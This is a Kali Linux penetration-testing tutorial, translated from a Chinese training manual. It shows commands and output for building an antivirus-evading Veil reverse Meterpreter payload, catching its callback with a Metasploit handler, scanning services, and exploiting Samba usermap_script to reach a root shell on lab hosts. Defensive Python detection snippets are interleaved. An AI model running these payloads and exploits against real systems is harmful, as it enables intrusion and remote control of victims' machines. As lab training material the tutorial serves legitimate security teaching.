         Veil-Evasion | [Version]: 2.4.3
        =========================================================================
         [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
        =========================================================================

         [*] Available payloads:

                 1)      c/meterpreter/rev_tcp
                 2)      c/meterpreter/rev_tcp_service
                 3)      c/shellcode_inject/virtual
                 4)      c/shellcode_inject/void
                 5)      cs/meterpreter/rev_tcp
                 6)      cs/shellcode_inject/base64_substitution
                 7)      cs/shellcode_inject/virtual
                 8)      native/Hyperion
                 9)      native/backdoor_factory
                 10)     native/pe_scrambler
                 11)     powershell/shellcode_inject/download_virtual
                 12)     powershell/shellcode_inject/psexec_virtual
                 13)     powershell/shellcode_inject/virtual
                 14)     python/meterpreter/rev_http
                 15)     python/meterpreter/rev_http_contained
                 16)     python/meterpreter/rev_https
                 17)     python/meterpreter/rev_https_contained
                 18)     python/meterpreter/rev_tcp
                 19)     python/shellcode_inject/aes_encrypt
                 20)     python/shellcode_inject/arc_encrypt
                 21)     python/shellcode_inject/base64_substitution
                 22)     python/shellcode_inject/des_encrypt
                 23)     python/shellcode_inject/flat
                 24)     python/shellcode_inject/letter_substitution

    The output lists 24 available payloads. Any one of them can be used for the penetration attack.

    【Example 4-9】Use a Veil payload (cs/meterpreter/rev_tcp in this example) to carry out a penetration attack, with Windows 7 as the target. The steps are as follows:

    1) Start the Veil tool. Run the following command:

    • root@kali:~# veil-evasion

    After running the command, the following information is displayed:

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • Main Menu

    •          24 payloads loaded

    • Available commands:

    •          use            use a specific payload

    •          info             information on a specific payload

    •          list               list available payloads

    •          update         update Veil to the latest version

    •          clean           clean out payload folders

    •          checkvt         check payload hashes vs. VirusTotal

    •          exit              exit Veil

    • [>] Please enter a command:

    The [>] Please enter a command: prompt in the output indicates that Veil has started successfully.

    2) Select the cs/meterpreter/rev_tcp payload. In the payload list its number is 5. Run the following command:

    • [>] Please enter a command: use 5

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • Payload: cs/meterpreter/rev_tcp loaded

    • Required Options:

    • Name                          Current Value   Description

    •  ----                              -------------           ---------------------------------------

    •  LHOST                               IP of the metasploit handler

    •  LPORT                     4444    Port of the metasploit handler

    •  compile_to_exe             Y         Compile to an executable

    • Available commands:

    •          set              set a specific option value

    •          info             show information about the payload

    •          generate        generate payload

    •          back           go to the main menu

    •          exit              exit Veil

    •  [>] Please enter a command:

    The output shows the configurable options of the rev_tcp payload. The local port (LPORT) defaults to 4444; the LHOST option has not been set yet.

    3) Set the LHOST option and view the payload's details. Run the following commands:

    • [>] Please enter a command: set LHOST 192.168.6.103

    • [>] Please enter a command: info

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • Payload information:

    •        Name:                cs/meterpreter/rev_tcp

    •        Language:        cs

    •        Rating:               Excellent

    •        Description:    pure windows/meterpreter/reverse_tcp stager, no

    •                        shellcode

    • Required Options:

    • Name                        Current Value         Description

    •  ----                                 -----------------        ------------------------------------------

    •  LHOST           192.168.6.100        IP of the metasploit handler

    •  LPORT           4444                      Port of the metasploit handler

    •  compile_to_exe            Y                          Compile to an executable

    The output shows the details of the rev_tcp payload: its name, language, rating and the configured options.

    4) Now generate the payload file with the generate command. Run the following command:

    •  [>] Please enter a command: generate

    • =========================================================================

    •  Veil-Evasion | [Version]: 2.4.3

    • =========================================================================

    •  [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    • =========================================================================

    • [*] Press [enter] for 'payload'

    •  [>] Please enter the base name for output files: backup                                       # specify the base name of the output files

    The command above specifies backup as the file name. After pressing Enter, the following information is displayed:

    •  [*] Executable written to: /root/veil-output/compiled/backup.exe

    • Language:                         cs

    •  Payload:                             cs/meterpreter/rev_tcp

    •  Required Options:      LHOST=192.168.6.103  LPORT=4444  compile_to_exe=Y

    •  Payload File:                     /root/veil-output/source/backup.cs

    •  Handler File:                     /root/veil-output/handlers/backup_handler.rc

    • [*] Your payload files have been generated, don't get caught!

    •  [!] And don't submit samples to any online scanner! ;)

    • [>] press any key to return to the main menu:

    The output shows that an executable named backup.exe was generated and saved in /root/veil-output/compiled/. Once backup.exe is delivered to the target host, the payload can be used.

    Next, a handler must be created in Metasploit to wait for the target host to connect back to Kali Linux (the attacking host). Once the connection is established, a remote shell is obtained.

    【Example 4-10】Create the handler. The steps are as follows:

    1) Start the MSF console.

    2) Use the handler module. Run the following command:

    • msf > use exploit/multi/handler

    3) Load the reverse_tcp payload and set its options. Run the following commands:

    • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

    • payload => windows/meterpreter/reverse_tcp

    • msf exploit(handler) > set LHOST 192.168.6.103

    • LHOST => 192.168.6.103

    4) Launch the attack. Run the following command:

    • msf exploit(handler) > exploit

    • [*] Started reverse handler on 192.168.6.103:4444

    • [*] Starting the payload handler...

    The output shows that the handler has started and is waiting for the target host to connect.

    Now deliver the previously generated backup.exe to the target host (Windows 7) and run it. Back on Kali Linux, the following information appears:

    • [*] Sending stage (769536 bytes) to 192.168.6.110

    • [*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.110:2478) at 2014-07-17 10:44:47 +0800

    • meterpreter >

    The output shows that a Meterpreter session was opened successfully, meaning the target host has been compromised and shell commands can now be run. For example, to enter the target host's shell, run the following command:

    • meterpreter > shell

    • Process 1544 created.

    • Channel 1 created.

    • Microsoft Windows [ 6.1.7601]

    • 版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

    • C:\Users\bob\Desktop>

    The output shows that we are now in the command prompt of the Windows 7 target, and the currently logged-in user is bob.
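    As an added, defender-side illustration (not part of the original tutorial, and not code from Veil or Metasploit), the following Python sketch shows how the callback described above looks in host telemetry and how a simple rule could surface it. The record schema, paths and byte counts are constructed for this example: the first record mirrors the session above (backup.exe run from the user's Desktop connecting to the handler on port 4444 and receiving a 769536-byte stage), the other two are ordinary traffic. The port list, path fragments and thresholds are assumptions to be tuned against your own baseline.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ConnEvent:
    """One outbound connection as a host sensor would report it.

    Constructed schema for this example: a Sysmon-style network-connection
    event joined with the byte counts seen in the first seconds of the flow.
    """
    host: str
    image: str        # full path of the process that opened the connection
    dst_ip: str
    dst_port: int
    bytes_sent: int   # bytes the host sent right after connecting
    bytes_recv: int   # bytes the host received in the same window


# Constructed sample records (see the lead-in): one stager-like callback and
# two benign connections on the same workstation.
SAMPLE_EVENTS = [
    ConnEvent("WIN7-BOB", r"C:\Users\bob\Desktop\backup.exe",
              "192.168.6.103", 4444, 300, 769536),
    ConnEvent("WIN7-BOB", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              "93.184.216.34", 443, 2100, 48000),
    ConnEvent("WIN7-BOB", r"C:\Windows\System32\svchost.exe",
              "192.168.6.1", 53, 80, 120),
]

# Ports a workstation is expected to talk to; anything else is notable (assumption).
COMMON_PORTS = {53, 80, 443, 445, 139, 135, 3389}
# Lower-case path fragments of locations an unprivileged user can write to (assumption).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


def score_event(ev: ConnEvent) -> List[str]:
    """Return the reasons this connection looks like a reverse-shell stager."""
    reasons = []
    if any(frag in ev.image.lower() for frag in USER_WRITABLE):
        reasons.append("process image in a user-writable directory")
    if ev.dst_port not in COMMON_PORTS:
        reasons.append(f"uncommon destination port {ev.dst_port}")
    # A staged reverse payload sends a tiny stager request and then pulls a
    # large second stage, so inbound volume dwarfs outbound right after connect.
    if ev.bytes_recv >= 256 * 1024 and ev.bytes_recv > 50 * ev.bytes_sent:
        reasons.append("large inbound blob right after connect (stage download)")
    return reasons


def find_suspicious(events: List[ConnEvent],
                    min_reasons: int = 2) -> List[Tuple[str, str, str, int, List[str]]]:
    """Keep events that trigger at least min_reasons heuristics."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev.host, ev.image, ev.dst_ip, ev.dst_port, reasons))
    return hits


if __name__ == "__main__":
    for host, image, ip, port, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {ip}:{port}")
        for r in reasons:
            print("   -", r)
```

    Requiring two independent signals before alerting keeps a single odd port or a single large download from paging anyone; the stage-size heuristic is the one that distinguishes a staged Meterpreter callback from a plain outbound connection.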

    This article is excerpted from the Kail Linux Penetration Testing Training Manual (Kail Linux渗透测试实训手册), internal material of 大学霸. Please credit the source when reposting; respect technology and respect IT professionals!



    Kail Linux Penetration Testing Tutorial: Scanning in Metasploit

    Scanning in Metasploit

    Metasploit ships with a large number of built-in scanners. They can be used to discover services and gather service information from a single computer or an entire network. This section shows how to scan with Metasploit's auxiliary modules.

    【Example 4-4】Scan a target host in Metasploit. The steps are as follows:

    (1) Start the MSF console. Run the following command:

    root@kali:~# msfconsole

    msf>

    (2) Search for all available scanner modules. Run the following command:

    msf > search scanner

    Matching Modules

    ================

       Name                                 Disclosure Date     Rank           Description

       ----                                    --------------------    -----------  ---------------------------------------------

       auxiliary/admin/smb/check_dir_file                             normal  SMB Scanner Check File/Directory Utility

       auxiliary/bnat/bnat_scan                                       normal  BNAT Scanner

       auxiliary/gather/citrix_published_applications                  normal  Citrix MetaFrame ICA Published Applications Scanner

       auxiliary/gather/enum_dns                                     normal  DNS Record Scanner and Enumerator

       auxiliary/gather/natpmp_external_address                      normal  NAT-PMP External Address Scanner

       auxiliary/gather/windows_deployment_services_shares        normal  Microsoft Windows Deployment Services Unattend Gatherer

       auxiliary/pro/nexpose                                         normal  PRO: Nexpose Scanner Integration

       auxiliary/pro/webscan                                          normal  PRO: Web Application Scanner

       auxiliary/scanner/afp/afp_login                                 normal  Apple Filing Protocol Login Utility

       auxiliary/scanner/afp/afp_server_info                                     normal  Apple Filing Protocol Info Enumerator

       auxiliary/scanner/backdoor/energizer_duo_detect              normal  Energizer DUO Trojan Scanner

       auxiliary/scanner/chargen/chargen_probe     1996-02-08       normal  Chargen Probe Utility

    The output lists all scanner modules available in Metasploit, covering many kinds of services. To narrow the list, search for the scanner modules for the SSH service.

    (3) Search for the SSH scanner modules. Run the following command:

    msf > search scanner/ssh

    Matching Modules

    ================

       Name                                     Disclosure Date  Rank    Description

       ----                                         ---------------    -----------  -------------------------------------------

       auxiliary/scanner/ssh/cerberus_sftp_enumusers  2014-05-27 normal     Cerberus FTP Server SFTP Username Enumeration

       auxiliary/scanner/ssh/ssh_enumusers                          normal     SSH Username Enumeration

       auxiliary/scanner/ssh/ssh_identify_pubkeys                                normal     SSH Public Key Acceptance Scanner

       auxiliary/scanner/ssh/ssh_login                              normal     SSH Login Check Scanner

       auxiliary/scanner/ssh/ssh_login_pubkey                       normal     SSH Public Key Login Scanner

       auxiliary/scanner/ssh/ssh_version                            normal     SSH Version Scanner

    The output shows several SSH modules. Choose the appropriate one to scan with.

    (4) Use the ssh_version module to scan the SSH service. Run the following command:

    msf > use auxiliary/scanner/ssh/ssh_version

    (5) View the configurable options of the ssh_version module. Run the following command:

    msf auxiliary(ssh_version) > show options

    Module options (auxiliary/scanner/ssh/ssh_version):

       Name      Current Setting  Required             Description

       ------------     ---------------     --------      -----------------------------------------------------------------------------

       RHOSTS                             yes       The target address range or CIDR identifier

       RPORT    22                  yes       The target port

       THREADS          1                    yes       The number of concurrent threads

       TIMEOUT                     30                  yes       Timeout for the SSH probe

    The output shows the module's configurable options; the RHOSTS option has not been set.

    (6) Set the RHOSTS option. Run the following command:

    msf auxiliary(ssh_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    The output confirms that RHOSTS (the target host address) is now 192.168.6.105 (the Metasploitable 2 system).

    (7) Start the scan. Run the following command:

    msf auxiliary(ssh_version) > exploit

    [*] 192.168.6.105:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    msf auxiliary(ssh_version) >

    The output shows that the target is running an SSH service with version SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.

    【Example 4-5】Scan a MySQL server. The steps are as follows:

    (1) Start the MSF console. Run the following command:

    root@kali:~# msfconsole

    msf>

    (2) Use the mysql_version module and view its configurable options. Run the following commands:

    msf > use auxiliary/scanner/mysql/mysql_version

    msf auxiliary(mysql_version) > show options

    Module options (auxiliary/scanner/mysql/mysql_version):

       Name     Current Setting  Required  Description

       ----     ---------------  --------  -----------

       RHOSTS                    yes       The target address range or CIDR identifier

       RPORT    3306             yes       The target port

       THREADS  1                yes       The number of concurrent threads

    The output shows that RHOSTS is not set. Set RHOSTS to the target host's address.

    (3) Set RHOSTS and scan the MySQL service. Run the following commands:

    msf auxiliary(mysql_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    msf auxiliary(mysql_version) > exploit

    [*] 192.168.6.105:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    The output shows that the target host is running MySQL 5.0.51a.

    【Example 4-6】Scan the Telnet service. The steps are as follows:

    (1) Start the MSF console. Run the following command:

    root@kali:~# msfconsole

    msf>

    (2) Use the telnet_version module and view its configurable options. Run the following commands:

    msf > use auxiliary/scanner/telnet/telnet_version

    msf auxiliary(telnet_version) > show options

    Module options (auxiliary/scanner/telnet/telnet_version):

       Name      Current Setting  Required    Description

       ----         ---------------     ---------------  -----------------------------------------------------------------------

       PASSWORD                    no        The password for the specified username

       RHOSTS                         yes       The target address range or CIDR identifier

       RPORT             23              yes       The target port

       THREADS         1               yes       The number of concurrent threads

       TIMEOUT           30              yes       Timeout for the Telnet probe

       USERNAME                    no        The username to authenticate as

    The output shows four required options. Three of them already have values; now set RHOSTS.

    (3) Set RHOSTS and start the scan. Run the following commands:

    msf auxiliary(telnet_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    msf auxiliary(telnet_version) > exploit

     [*] 192.168.6.105:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                         \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    The output is only a block of banner text with no version information about the Telnet service. It does, however, reveal login details: Login with msfadmin/msfadmin to get started. This gives the username and password for the target's Telnet service, so a login can be attempted.

    (4) Log in to the target host's Telnet service. Run the following command:

    root@kali:~# telnet -l msfadmin 192.168.6.105

    Trying 192.168.6.105...

    Connected to 192.168.6.105.

    Escape character is '^]'.

    Password:                                                                         # enter the password msfadmin

    Last login: Tue Jul  8 06:32:46 EDT 2014 on tty1

    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

    The programs included with the Ubuntu system are free software;

    the exact distribution terms for each program are described in the

    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

    applicable law.

    To access official Ubuntu documentation, please visit:

    http://help.ubuntu.com/

    No mail.

    msfadmin@metasploitable:~$

    The output above is the Telnet login banner. The msfadmin@metasploitable:~$ prompt indicates a successful login, and standard Linux commands can now be run. For example, to view the user's group memberships, run the following command:

    msfadmin@metasploitable:~$ id

    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

    The output shows information about the msfadmin user. Here gid indicates that the first group account in groups is the user's primary group; the other group accounts in groups are the user's supplementary groups.

    Metasploit can also scan a range of addresses. The following example scans a network for hosts running a Samba server. First, a single address is scanned for a Samba server.

    【Example 4-7】Scan the Samba server on the host 192.168.6.105. The steps are as follows:

    (1) Start the MSF console. Run the following command:

    root@kali:~# msfconsole

    msf>

    (2) Use the smb_version module and view its configurable options. Run the following commands:

    msf > use auxiliary/scanner/smb/smb_version

    msf auxiliary(smb_version) > show options

    Module options (auxiliary/scanner/smb/smb_version):

       Name       Current Setting   Required           Description

       ----       ---------------         -----------   -----------------------------------------------------------------------

       RHOSTS                     yes       The target address range or CIDR identifier

       SMBDomain  WORKGROUP    no        The Windows domain to use for authentication

       SMBPass                      no        The password for the specified username

       SMBUser                      no        The username to authenticate as

       THREADS    1                yes       The number of concurrent threads

    (3) Set the RHOSTS option. Run the following command:

    msf auxiliary(smb_version) > set RHOSTS 192.168.6.105

    RHOSTS => 192.168.6.105

    (4) Start the scan. Run the following command:

    msf auxiliary(smb_version) > exploit

    [*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)

    [*] Scanned 1 of 1 hosts (100% complete)

    [*] Auxiliary module execution completed

    The output shows the running Samba server and its version.

    Next, scan the 192.168.6.0/24 network for all hosts running a Samba server. The steps are as follows:

    (1) Select the smb_version module. Run the following command:

    msf > use auxiliary/scanner/smb/smb_version

    (2) Set the smb_version module's options. Run the following commands:

    msf auxiliary(smb_version) > set RHOSTS 192.168.6.0/24

    RHOSTS => 192.168.6.0/24

    msf auxiliary(smb_version) > set THREADS 255

    THREADS => 255

    (3) Start the scan. Run the following command:

    msf auxiliary(smb_version) > exploit

    [*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:WIN-RKPKQFBLG6C) (domain:WORKGROUP)

    [*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)

    [*] 192.168.6.104:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:LYW) (domain:LYW)

    [*] 192.168.6.110:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:AA-886OKJM26FSW) (domain:WORKGROUP)

    [*] Scanned 255 of 256 hosts (099% complete)

    [*] Scanned 256 of 256 hosts (100% complete)

    [*] Auxiliary module execution completed

    The output shows four hosts on the 192.168.6.0/24 network running a Samba server, along with the operating system type of each host.

    【Example 4-8】Exploit the Samba server. The steps are as follows:

    (1) Start the MSF console. Run the following command:

    root@kali:~# msfconsole

    msf>

    (2) Search for the usermap module. Run the following command:

    msf > search samba/usermap

    Matching Modules

    ================

       Name                            Disclosure Date   Rank       Description

       ----                                ---------------     -----------     -----------------------------------------------

       exploit/multi/samba/usermap_script  2007-05-14      excellent  Samba "username map script" Command Execution

    The output shows one usermap module.

    (3) View the details of the usermap_script module. Run the following command:

    msf > info exploit/multi/samba/usermap_script

           Name: Samba "username map script" Command Execution

         Module: exploit/multi/samba/usermap_script

       Platform: Unix

     Privileged: Yes

        License: Metasploit Framework License (BSD)

           Rank: Excellent

    Provided by:

      jduck <jduck@metasploit.com>

    Available targets:

      Id  Name

      --  ----

      0   Automatic

    Basic options:

      Name   Current Setting  Required  Description

      ----      ---------------       --------    -----------

      RHOST                   yes       The target address

      RPORT  139              yes       The target port

    Payload information:

      Space: 1024

    Description:

      This module exploits a command execution vulerability in Samba

      versions 3.0.20 through 3.0.25rc3 when using the non-default

      "username map script" configuration option. By specifying a username

      containing shell meta characters, attackers can execute arbitrary

      commands. No authentication is needed to exploit this vulnerability

      since this option is used to map usernames prior to authentication!

    References:

      http://cvedetails.com/cve/2007-2447/

      http://www.osvdb.org/34700

      http://www.securityfocus.com/bid/23972

      http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534

      http://samba.org/samba/security/CVE-2007-2447.html

    The output shows the details of the usermap_script module. Only the RHOST option needs to be set; no payload has to be loaded explicitly, because a Linux command shell is used automatically.
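    The scanner output in this section and the module description above together make up the raw material of an exposure review: which hosts run which service versions, and which of those versions fall inside a range an exploit module targets. The following Python example, added here and not part of the original tutorial or of Metasploit, parses the result lines printed by the ssh_version, mysql_version and smb_version runs above into inventory records and checks them against a watch list. The transcript is constructed from the lines shown on this page; the only watched range is the Samba 3.0.20 through 3.0.25rc3 span stated in the usermap_script description (CVE-2007-2447), which applies only when the non-default "username map script" option is set, so a hit is a prompt to check smb.conf rather than a confirmed finding. Regular expressions and the watch-list format are this example's own assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed transcript: the result lines printed by the ssh_version,
# mysql_version and smb_version runs in this section, pasted together.
SAMPLE_OUTPUT = """\
[*] 192.168.6.105:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] 192.168.6.105:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:WIN-RKPKQFBLG6C) (domain:WORKGROUP)
[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Auxiliary module execution completed
"""

# Result lines have the shape "[*] host:port is running ..." or
# "[*] host:port, SSH server version: ..."; status lines do not match.
LINE_RE = re.compile(
    r"^\[\*\] (?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+),?\s+"
    r"(?:is running |SSH server version: )(?P<banner>.+)$"
)

# Product/version extractors, tried in order against the banner text.
PRODUCT_RES = [
    ("Samba",   re.compile(r"Samba (\d+\.\d+\.\d+)")),
    ("OpenSSH", re.compile(r"OpenSSH_(\d+\.\d+p?\d*)")),
    ("MySQL",   re.compile(r"MySQL (\d+\.\d+\.\d+[a-z]?)")),
    ("Windows", re.compile(r"^(Windows .+?)(?: \(|$)")),
]

# Version ranges to review: (product, lowest, highest, note). The Samba range
# is the one stated in the usermap_script module description on this page.
WATCHLIST = [
    ("Samba", "3.0.20", "3.0.25",
     "CVE-2007-2447: confirm whether 'username map script' is set in smb.conf"),
]


def version_tuple(version: str) -> Tuple[int, ...]:
    """Numeric comparison key; pre-release suffixes such as rc3 are ignored."""
    return tuple(int(n) for n in re.findall(r"\d+", version)[:3])


def parse_scanner_output(text: str) -> List[Dict[str, object]]:
    """Turn auxiliary-scanner result lines into inventory records."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # progress and status lines carry no service data
        banner = m.group("banner")
        product, version = "unknown", banner
        for name, rx in PRODUCT_RES:
            pm = rx.search(banner)
            if pm:
                product, version = name, pm.group(1)
                break
        records.append({"host": m.group("host"), "port": int(m.group("port")),
                        "product": product, "version": version, "banner": banner})
    return records


def flag_versions(records, watchlist=WATCHLIST):
    """Return (host, port, 'product version', note) for records inside a watched range."""
    findings = []
    for r in records:
        for product, low, high, note in watchlist:
            if r["product"] == product and \
               version_tuple(low) <= version_tuple(r["version"]) <= version_tuple(high):
                findings.append((r["host"], r["port"], f"{product} {r['version']}", note))
    return findings


if __name__ == "__main__":
    inventory = parse_scanner_output(SAMPLE_OUTPUT)
    for rec in inventory:
        print(f"{rec['host']}:{rec['port']}  {rec['product']} {rec['version']}")
    for host, port, what, note in flag_versions(inventory):
        print(f"REVIEW {host}:{port} {what} -> {note}")
```

    Run against the transcript above, the inventory holds four records and exactly one review item, the Samba 3.0.20 host; the Windows and OpenSSH entries are kept as inventory but are not matched against any range.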

    (4) Select the usermap_script module and set the RHOST option. Run the following commands:

    msf > use exploit/multi/samba/usermap_script

    msf exploit(usermap_script) > set RHOST 192.168.6.105

    RHOST => 192.168.6.105

    (5) Launch the exploit. Run the following command:

    msf exploit(usermap_script) > exploit

     [*] Started reverse double handler

    [*] Accepted the first client connection...

    [*] Accepted the second client connection...

    [*] Command: echo IwmN37I0D3cTGJhv;

    [*] Writing to socket A

    [*] Writing to socket B

    [*] Reading from sockets...

    [*] Reading from socket B

    [*] B: "IwmN37I0D3cTGJhv\r\n"

    [*] Matching...

    [*] A is input...

    [*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:34848) at 2014-07-16 10:00:59 +0800

    The output shows that a session was opened successfully, meaning the target host has been compromised. Linux commands can now be run to inspect the target host, as shown below:

    whoami                                                                     # show the currently logged-in user

    root

    The output shows that the current user on the target is root. For more details about the user, run the id command, as shown below:

    id                                                                                 # show details of the current user

    uid=0(root) gid=0(root)

    The output shows that the root user belongs to the root group and that both its UID and GID are 0.
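    Both id outputs in this article (the msfadmin one from the Telnet session and the root one just above) follow the same uid=/gid=/groups= format, and a host reviewer usually wants the same two things from them: the primary group taken from gid, and which of the remaining group memberships carry elevated access. The Python example below is added here and is not part of the original tutorial; it parses an id(1) line, treats the gid entry as the primary group and the other groups= entries as supplementary, and handles the root case where the groups= field is absent altogether. The two inputs are constructed from the lines on this page, and the set of privileged group names is an assumption to adjust to your own baseline.

```python
import re
from typing import Dict, List

# Constructed inputs: the two id(1) outputs shown in this article. The root
# one, printed by the usermap_script command shell, has no groups= field.
ID_MSFADMIN = ("uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),"
               "24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),"
               "107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)")
ID_ROOT = "uid=0(root) gid=0(root)"

# Groups whose membership commonly grants root-equivalent or broad access on
# Ubuntu-family systems; an assumption for this example.
PRIVILEGED_GROUPS = {"root", "admin", "sudo", "wheel", "adm", "lpadmin"}

# One "1000(msfadmin)" style entry.
ENTRY_RE = re.compile(r"(\d+)\(([^)]*)\)")


def parse_id(output: str) -> Dict[str, object]:
    """Parse one id(1) line into uid, primary group, supplementary groups and
    the privileged groups among them."""
    fields = dict(part.split("=", 1) for part in output.split() if "=" in part)
    uid_m = ENTRY_RE.match(fields.get("uid", ""))
    gid_m = ENTRY_RE.match(fields.get("gid", ""))
    if not uid_m or not gid_m:
        raise ValueError("not an id(1) line: " + output)
    primary_id, primary_name = int(gid_m.group(1)), gid_m.group(2)
    # groups= is absent on some minimal shells; treat that as no extra groups.
    members = [(int(g), n) for g, n in ENTRY_RE.findall(fields.get("groups", ""))]
    # The primary group is repeated inside groups=; drop it from the supplementary list.
    supplementary = [n for g, n in members if g != primary_id]
    return {
        "uid": int(uid_m.group(1)),
        "user": uid_m.group(2),
        "primary_group": primary_name,
        "supplementary": supplementary,
        "privileged": sorted(({primary_name} | set(supplementary)) & PRIVILEGED_GROUPS),
        "is_root": int(uid_m.group(1)) == 0,
    }


def review(output: str) -> List[str]:
    """Notes a host reviewer would want from one id(1) line."""
    info = parse_id(output)
    notes = [f"{info['user']} (uid {info['uid']}) primary group {info['primary_group']}"]
    if info["is_root"]:
        notes.append("uid 0: full root privileges")
    if info["privileged"]:
        notes.append("member of privileged group(s): " + ", ".join(info["privileged"]))
    return notes


if __name__ == "__main__":
    for line in (ID_MSFADMIN, ID_ROOT):
        for note in review(line):
            print(note)
        print()
```

    On the msfadmin line this reports adm, admin and lpadmin as privileged memberships, which on that distribution is effectively sudo access; on the root line it reports uid 0 and no supplementary groups at all.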
